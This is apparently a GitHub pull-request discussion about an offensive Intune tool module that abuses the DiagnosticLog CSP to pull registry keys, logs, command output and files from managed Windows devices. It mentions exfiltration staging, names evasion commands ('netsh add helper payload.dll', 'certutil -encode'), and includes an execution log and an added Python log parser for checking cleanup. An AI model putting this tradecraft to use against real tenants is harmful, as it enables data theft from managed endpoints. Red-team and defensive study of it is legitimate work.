Open pl4nty opened 1 month ago
My test token from intune.microsoft.com was missing a `upn` claim too, so I added a fallback to `email`.
I also hit a strange bug where the test token was missing from requests, so I added this workaround in a few places because I couldn't find the root cause.
Besides the DiagnosticLog CSP, I've been playing with win32 storage and Delivery Optimization for staging/exfil. Could PR the results early next year if you'd like? The authn flows are pretty gnarly though
This looks really useful @pl4nty! Great stuff! I'll take a look in my lab and get back to you with any questions I have before merging. Thank you for the contribution!
I fixed the provided access token bug, added deletion commands for the artifacts, and allowed optional device sync. I'm still trying to "catch" the PUT request. Does IME check that the destination is a valid web service or does it just send the PUT wherever it's pointed? I've been using netcat without success.
I think it's just from spamming sync all day. These rate limits make troubleshooting pretty painful.
Supports registry keys, event logs, command output, and files/folders, subject to significant restrictions. Could bypass (`netsh add helper payload.dll` or `certutil -encode` come to mind), but they're pretty noisy. This talk might have some ideas.

https://learn.microsoft.com/en-us/windows/client-management/mdm/diagnosticlog-csp#diagnosticarchivearchivedefinition

I used config for simplicity. Might be worth reminding users to `sync` after `upload` for faster results, but not automating it in case they want to batch changes and avoid the ratelimit.

An alternative to config is writing regkeys via script like
then triggering diag log collection via Graph, and polling until the archive is available for download. I think that triggers a WNS notif so could be much faster, and uses Intune-managed storage, but leaves artefacts in the registry and in Intune.
Did some quick tests of these changes with `exec intune upload --access-token` and I've used similar payloads before, but ran out of time for e2e testing tonight.

Logs
```
2024-11-02 15:23:39.489 UTC - [INFO] Execution started
2024-11-02 15:23:39.693 UTC - [DEBUG] Database option not used, skipping storage of this Jwt
2024-11-02 15:23:39.697 UTC - [INFO] Creating new device assignment filter with displayName: 70c3ccd5-1aae-4e28-ac39-39f54c06abf2
2024-11-02 15:23:39.737 UTC - [VERBOSE] Sending POST request to: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters
2024-11-02 15:23:42.444 UTC - [VERBOSE] Received 201 (Created) status code from: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters {"@odata.context":"https://graph.microsoft.com/beta/$metadata#deviceManagement/assignmentFilters/$entity","id":"d91f479f-06d8-4126-b26f-1a0b803385ae","createdDateTime":"2024-11-02T15:23:35.8286302Z","lastModifiedDateTime":"2024-11-02T15:23:35.8286302Z","displayName":"70c3ccd5-1aae-4e28-ac39-39f54c06abf2","description":"","platform":"windows10AndLater","rule":"(device.deviceName -eq \"1234\")","roleScopeTags":["0"],"assignmentFilterManagementType":"devices","payloads":[]}
2024-11-02 15:23:42.446 UTC - [INFO] Obtained filter ID: d91f479f-06d8-4126-b26f-1a0b803385ae
2024-11-02 15:23:42.455 UTC - [INFO] Creating custom config policy for device: 1234
2024-11-02 15:23:42.459 UTC - [VERBOSE] Using ArchiveDefinition:
```
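Added example, not part of this PR or the project's own code: a small Python parser for the log format shown above that lists the Graph calls a run made and the tenant objects it created (the 201 responses carrying an `id`), which is what a reviewer or a blue team needs when checking that the deletion commands mentioned earlier actually removed every artifact. The sample log is constructed from the excerpt above (same timestamps, IDs and URLs, 201 body trimmed); the only assumption is that the log keeps the `timestamp UTC - [LEVEL] message` shape seen in that excerpt.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed sample in the same format as the log excerpt in this thread
# (timestamps, IDs and URLs copied from it; the 201 response body is trimmed).
SAMPLE_LOG = """\
2024-11-02 15:23:39.489 UTC - [INFO] Execution started
2024-11-02 15:23:39.697 UTC - [INFO] Creating new device assignment filter with displayName: 70c3ccd5-1aae-4e28-ac39-39f54c06abf2
2024-11-02 15:23:39.737 UTC - [VERBOSE] Sending POST request to: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters
2024-11-02 15:23:42.444 UTC - [VERBOSE] Received 201 (Created) status code from: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters {"@odata.context":"https://graph.microsoft.com/beta/$metadata#deviceManagement/assignmentFilters/$entity","id":"d91f479f-06d8-4126-b26f-1a0b803385ae","displayName":"70c3ccd5-1aae-4e28-ac39-39f54c06abf2","platform":"windows10AndLater","rule":"(device.deviceName -eq \\"1234\\")"}
2024-11-02 15:23:42.446 UTC - [INFO] Obtained filter ID: d91f479f-06d8-4126-b26f-1a0b803385ae
"""

# Assumed line shape: "<date> <time> UTC - [LEVEL] <message>" (as in the excerpt).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ UTC) - \[(?P<level>[A-Z]+)\] (?P<msg>.*)$"
)
REQUEST_RE = re.compile(r"^Sending (?P<method>[A-Z]+) request to: (?P<url>\S+)")
RESPONSE_RE = re.compile(
    r"^Received (?P<code>\d{3}) \([^)]*\) status code from: (?P<url>\S+)(?: (?P<body>\{.*\}))?$"
)


def parse_log(text: str) -> List[Dict[str, str]]:
    """Split the log into {ts, level, msg} records, skipping lines that don't match the shape."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def graph_requests(text: str) -> List[Tuple[str, str]]:
    """Every Graph call the run made, as (method, url), in log order."""
    out = []
    for rec in parse_log(text):
        m = REQUEST_RE.match(rec["msg"])
        if m:
            out.append((m.group("method"), m.group("url")))
    return out


def created_resources(text: str) -> List[Dict[str, str]]:
    """Objects the run created in the tenant: each 201 response whose JSON body carries an id."""
    out = []
    for rec in parse_log(text):
        m = RESPONSE_RE.match(rec["msg"])
        if not m or m.group("code") != "201" or not m.group("body"):
            continue
        try:
            body = json.loads(m.group("body"))
        except json.JSONDecodeError:
            continue  # body truncated in the log, nothing reliable to extract
        if "id" in body:
            out.append({
                "time": rec["ts"],
                "collection": m.group("url"),
                "id": body["id"],
                "displayName": body.get("displayName", ""),
            })
    return out


def cleanup_targets(text: str) -> List[str]:
    """Graph URLs to DELETE (or GET, expecting 404) when verifying a run's artifacts are gone."""
    return [f'{r["collection"]}/{r["id"]}' for r in created_resources(text)]


if __name__ == "__main__":
    for r in created_resources(SAMPLE_LOG):
        print(f'{r["time"]}  {r["collection"]}  id={r["id"]}  displayName={r["displayName"]}')
    for url in cleanup_targets(SAMPLE_LOG):
        print("DELETE", url)
```

Running it against a real run's log gives the per-object URLs to check after the deletion commands have executed; anything that still answers with 200 is a leftover artifact. Responses whose body was cut off in the log are skipped rather than guessed at.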